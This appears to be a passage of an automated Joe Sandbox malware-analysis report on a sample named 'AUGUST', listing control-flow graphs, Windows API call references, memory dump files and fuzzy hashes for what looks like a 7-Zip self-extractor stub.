                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                          • DispatchMessageW.USER32(?), ref: 00401B89
                          • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                          • String ID: Static
                          • API String ID: 2479445380-2272013587
                          • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                          • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                          • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                          • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                          APIs
                          • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                          • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@memcpymemmove
                          • String ID:
                          • API String ID: 3549172513-3916222277
                          • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                          • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                          • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                          • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 852 4033f8-4033fa 838->852 853 403419-40341b 839->853 854 40340a-403417 call 407776 839->854 840->831 848 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->848 849 40347f-40348a 841->849 844->837 845 4033b6 844->845 845->835 865 4034bc-4034c0 848->865 849->848 850 40348c-403490 849->850 850->848 856 403492-403497 850->856 860 40349c-4034a5 ??3@YAXPAX@Z 852->860 857 40346b-403475 ??3@YAXPAX@Z 853->857 858 40341d-40343c memcpy 853->858 854->852 856->848 862 403499-40349b 856->862 857->865 863 403451-403455 858->863 864 40343e 858->864 860->865 862->860 867 403440-403448 863->867 868 403457-403464 call 401986 863->868 866 403450 864->866 866->863 867->868 869 40344a-40344e 867->869 868->854 872 403466-403469 868->872 869->866 869->868 872->857 872->858
                          APIs
                          • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                          • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                          • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                            • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                            • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                          • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                          • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                          • String ID:
                          • API String ID: 846840743-0
                          • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                          • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                          • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                          • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                            • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                            • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                            • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                            • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                            • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                            • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                            • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                            • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                            • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                            • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                          • wsprintfW.USER32 ref: 004044A7
                            • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                          • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                          • String ID: 7zSfxFolder%02d$IA
                          • API String ID: 3387708999-1317665167
                          • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                          • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                          • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                          • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 924 408f26 923->924 925 408f19-408f24 923->925 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 924->927 925->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 945 409199-4091b0 935->945 946 409019-40901c 935->946 939 409020-409035 call 40e8da call 40874d 936->939 966 408fb0-408fb2 937->966 967 408fb6-408fbb 937->967 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 945->952 953 40934c-409367 call 4087ea 945->953 946->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 968 4090ad-4090b3 955->968 969 40907f 955->969 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 964 409051-409061 call 408726 958->964 959->964 988 409063-409066 964->988 989 409068 964->989 966->967 970 408fc3-408fcf 967->970 971 408fbd-408fbf 967->971 981 409187-409196 call 408e83 968->981 982 4090b9-4090d9 call 40d94b 968->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 969->977 970->922 970->923 971->970 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->968 1016 409261-409264 978->1016 1017 4092c9 978->1017 986 4091f7-409209 979->986 987 4092b9-4092bb 979->987 981->945 993 4090de-4090e6 982->993 1002 4093a4-4093b8 call 408761 983->1002 1003 4093ba-4093d6 983->1003 1014 409293-409295 986->1014 1015 40920f-409211 986->1015 1004 4092bf-4092c4 987->1004 996 40906a 988->996 989->996 1000 409283-409288 993->1000 1001 4090ec-4090f3 993->1001 996->955 1012 409290 1000->1012 1013 40928a-40928c 1000->1013 1008 409121-409124 1001->1008 1009 4090f5-4090f9 1001->1009 1002->1003 1080 4093d7 call 40ce70 1003->1080 1081 4093d7 call 40f160 1003->1081 1004->977 1022 4092b2-4092b7 1008->1022 1023 40912a-409138 call 408726 1008->1023 1009->1008 1018 4090fb-4090fe 1009->1018 1012->1014 1013->1012 1025 409297-409299 1014->1025 1026 40929d-4092a0 1014->1026 1015->978 1024 409213-409215 1015->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->987 1022->1004 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1050 409281 1027->1050 1028->1046 1051 409114-40911f call 40d6cb 1028->1051 1029->1004 1034 4092ac-4092ae 1029->1034 1037 4092d4-4092e0 call 408a55 1030->1037 1038 40931d-409346 call 40e959 * 2 1030->1038 1034->1022 1057 4092e2-4092ec 1037->1057 1058 4092ee-4092fa call 408aa0 1037->1058 1038->953 1038->957 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1050->1030 1051->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1066 409165-409167 1060->1066 1067 40916b-409170 1060->1067 1063->1037 1063->1038 1066->1067 1071 409172-409174 1067->1071 1072 409178-409181 1067->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                          • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID: IA$IA
                          • API String ID: 1033339047-1400641299
                          • Opcode ID: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                          • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                          • Opcode Fuzzy Hash: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                          • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: free
                          • String ID: $KA$4KA$HKA$\KA
                          • API String ID: 1294909896-3316857779
                          • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                          • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                          • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                          • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1121 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1121 1122 40983c-409846 call 409425 1112->1122 1113->1114 1115 409780-409796 call 4094e0 call 40969d call 40e959 1114->1115 1116 4097a3-4097a8 1114->1116 1137 40979b-4097a1 1115->1137 1119 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1116->1119 1120 4097aa-4097b4 1116->1120 1125 4097f3-409809 1119->1125 1120->1119 1120->1125 1133 409881-40989a call 4010e2 call 40eb24 1121->1133 1134 409878-40987f call 40ebf7 1121->1134 1144 40984a-40984c 1122->1144 1130 40980c-409814 1125->1130 1136 409816-409825 call 409403 1130->1136 1130->1137 1154 40989d-4098c0 call 40eb19 1133->1154 1134->1133 1136->1130 1137->1109 1144->1110 1157 4098c2-4098c7 1154->1157 1158 4098f6-4098f9 1154->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1164 409954 1159->1164 1165 40994b-409952 call 409c13 1159->1165 1166 409902-409904 1160->1166 1167 409908-40991e call 409530 call 409425 1160->1167 1161->1162 1180 4098e9-4098eb 1162->1180 1181 4098ef-4098f1 1162->1181 1170 409956-40996d call 4010e2 1164->1170 1165->1170 1166->1167 1167->1159 1182 40997b-4099a0 call 409fb4 1170->1182 1183 40996f-409978 1170->1183 1180->1181 1181->1110 1186 4099a2-4099a7 1182->1186 1187 4099e3-4099e6 1182->1187 1183->1182 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1154 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1226 409aa2-409aa4 1213->1226 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1223 409a73-409a75 1218->1223 1224 409a79-409a91 call 409530 call 409425 1218->1224 1219->1213 1220->1195 1221 409adf-409ae5 1220->1221 1221->1195 1223->1224 1224->1144 1233 409a97-409a9d 1224->1233 1229 409aa6-409aa8 1226->1229 1230 409aac-409ab0 1226->1230 1229->1230 1230->1195 1233->1144
                          APIs
                          • _EH_prolog.MSVCRT ref: 004096D0
                          • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                          • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                            • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??2@$H_prolog
                          • String ID: HIA
                          • API String ID: 3431946709-2712174624
                          • Opcode ID: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                          • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                          • Opcode Fuzzy Hash: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                          • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                          APIs
                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                          • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                          • memcmp.MSVCRT(?,?,?), ref: 004028E4
                          • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                          • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: lstrlenmemcmp$memmove
                          • String ID:
                          • API String ID: 3251180759-0
                          • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                          • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                          • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                          • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                          • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                            • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                            • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                            • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                            • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                            • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                            • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
